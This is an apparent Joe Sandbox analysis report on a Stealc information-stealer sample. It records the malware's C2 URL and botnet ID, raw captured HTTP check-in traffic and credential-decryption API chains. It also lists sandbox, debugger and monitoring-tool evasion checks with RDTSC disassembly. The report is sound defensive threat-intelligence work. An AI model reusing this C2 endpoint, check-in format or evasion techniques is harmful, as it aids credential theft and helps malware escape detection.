Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1525663
MD5:1840b3a6769699f03fca969af6b4e883
SHA1:53eeeb33aec86d2f03dc021351ffb61c1118aadd
SHA256:247b59e9bb5df7c640981d51f2df6fd618414f802f3ce049c6fb469cf8a3a66d
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7400 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1840B3A6769699F03FCA969AF6B4E883)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1729629409.000000000120E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1688759783.0000000005130000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7400JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7400JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.e0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-04T13:51:06.058208+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.e0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000EC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_000EC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_000E7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_000E9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_000E9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_000F8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_000F38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000F4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_000EDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_000EE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_000EED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_000F4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000EDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_000EBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_000F3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000EF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000E16D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 33 42 44 43 44 38 41 33 44 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 2d 2d 0d 0a Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="hwid"53BDCD8A3D9D1524750037------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="build"doma------AKKECAFBFHJDGDHIEHJD--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_000E4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 33 42 44 43 44 38 41 33 44 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 2d 2d 0d 0a Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="hwid"53BDCD8A3D9D1524750037------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="build"doma------AKKECAFBFHJDGDHIEHJD--
                Source: file.exe, 00000000.00000002.1729629409.000000000120E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729629409.0000000001253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729629409.0000000001253000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729629409.0000000001289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7b0923665da6f1
                Source: file.exe, 00000000.00000002.1729629409.0000000001289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpHRPb
                Source: file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpS
                Source: file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1729629409.000000000120E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37v

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004128480_2_00412848
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B11700_2_004B1170
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046C9C40_2_0046C9C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B63800_2_004B6380
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041738D0_2_0041738D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B2C630_2_004B2C63
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A74C60_2_004A74C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004AA4BD0_2_004AA4BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0049C5630_2_0049C563
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BCD230_2_004BCD23
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057F5D60_2_0057F5D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B7E770_2_004B7E77
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004AF68D0_2_004AF68D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E7EDF0_2_003E7EDF
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 000E45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: zlzhjqsn ZLIB complexity 0.9950953584558824
                Source: file.exe, 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1688759783.0000000005130000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_000F9600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_000F3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UX9THANN.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1897472 > 1048576
                Source: file.exeStatic PE information: Raw size of zlzhjqsn is bigger than: 0x100000 < 0x1a9000

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;zlzhjqsn:EW;kjlhrbah:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;zlzhjqsn:EW;kjlhrbah:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000F9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1db9bd should be: 0x1d5331
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: zlzhjqsn
                Source: file.exeStatic PE information: section name: kjlhrbah
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412848 push ebx; mov dword ptr [esp], 49B1D488h0_2_0041285E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412848 push 5F9963D8h; mov dword ptr [esp], esi0_2_004128C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412848 push edi; mov dword ptr [esp], ecx0_2_004129C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412848 push 68C06886h; mov dword ptr [esp], edx0_2_004129CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412848 push 0FDF1D17h; mov dword ptr [esp], edi0_2_00412A83
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412848 push edi; mov dword ptr [esp], 48F34100h0_2_00412A88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412848 push eax; mov dword ptr [esp], esi0_2_00412AB3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079C053 push 3F0CDF26h; mov dword ptr [esp], ebx0_2_0079C100
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079C053 push esi; mov dword ptr [esp], 2199DFF4h0_2_0079C11F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079C053 push ecx; mov dword ptr [esp], 60A9E047h0_2_0079C131
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079C053 push 70E9487Ah; mov dword ptr [esp], ecx0_2_0079C160
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C0861 push edx; mov dword ptr [esp], eax0_2_004C0865
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000FB035 push ecx; ret 0_2_000FB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00521818 push ebx; mov dword ptr [esp], eax0_2_00521826
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079C01B push ecx; mov dword ptr [esp], 4FA3DA43h0_2_0079C035
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079C01B push 3F0CDF26h; mov dword ptr [esp], ebx0_2_0079C100
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079C01B push esi; mov dword ptr [esp], 2199DFF4h0_2_0079C11F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079C01B push ecx; mov dword ptr [esp], 60A9E047h0_2_0079C131
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079C01B push 70E9487Ah; mov dword ptr [esp], ecx0_2_0079C160
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059903C push eax; mov dword ptr [esp], esp0_2_00599080
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055B0DD push eax; mov dword ptr [esp], ecx0_2_0055B130
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D10D9 push eax; mov dword ptr [esp], ebx0_2_004D3704
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057F0EC push edx; mov dword ptr [esp], ebx0_2_0057F120
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057F0EC push ecx; mov dword ptr [esp], esi0_2_0057F171
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CF896 push edx; mov dword ptr [esp], 1A5D505Dh0_2_005CF92A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CF896 push edx; mov dword ptr [esp], 6EF0AF82h0_2_005CF98C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CF896 push 238F0BC2h; mov dword ptr [esp], edi0_2_005CFA43
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D28D6 push ebp; mov dword ptr [esp], ecx0_2_003D28FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00344938 push 653564A0h; mov dword ptr [esp], eax0_2_0034935F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056A174 push ebp; mov dword ptr [esp], ecx0_2_0056A194
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059296B push 43ABD101h; mov dword ptr [esp], eax0_2_005929A9
                Source: file.exeStatic PE information: section name: zlzhjqsn entropy: 7.955253982546698

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000F9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13577
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 342155 second address: 342169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jnp 00007F8B150D74F0h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 342169 second address: 341A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 cmc 0x00000007 push dword ptr [ebp+122D0421h] 0x0000000d mov dword ptr [ebp+122D1C3Eh], esi 0x00000013 call dword ptr [ebp+122D1BC1h] 0x00000019 pushad 0x0000001a xor dword ptr [ebp+122D218Ch], ecx 0x00000020 xor eax, eax 0x00000022 jnl 00007F8B146BCD65h 0x00000028 mov edx, dword ptr [esp+28h] 0x0000002c sub dword ptr [ebp+122D218Ch], edi 0x00000032 mov dword ptr [ebp+122D2B01h], eax 0x00000038 jns 00007F8B146BCD5Fh 0x0000003e pushad 0x0000003f cld 0x00000040 je 00007F8B146BCD56h 0x00000046 popad 0x00000047 mov esi, 0000003Ch 0x0000004c sub dword ptr [ebp+122D218Ch], edi 0x00000052 sub dword ptr [ebp+122D218Ch], esi 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c add dword ptr [ebp+122D218Ch], ebx 0x00000062 lodsw 0x00000064 jnp 00007F8B146BCD5Ch 0x0000006a mov dword ptr [ebp+122D19ADh], ebx 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 jne 00007F8B146BCD5Ch 0x0000007a mov ebx, dword ptr [esp+24h] 0x0000007e sub dword ptr [ebp+122D218Ch], ebx 0x00000084 pushad 0x00000085 add dword ptr [ebp+122D19ADh], edx 0x0000008b add edx, 33F31554h 0x00000091 popad 0x00000092 push eax 0x00000093 push eax 0x00000094 push edx 0x00000095 pushad 0x00000096 push eax 0x00000097 push edx 0x00000098 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 341A0B second address: 341A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 341A11 second address: 341A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
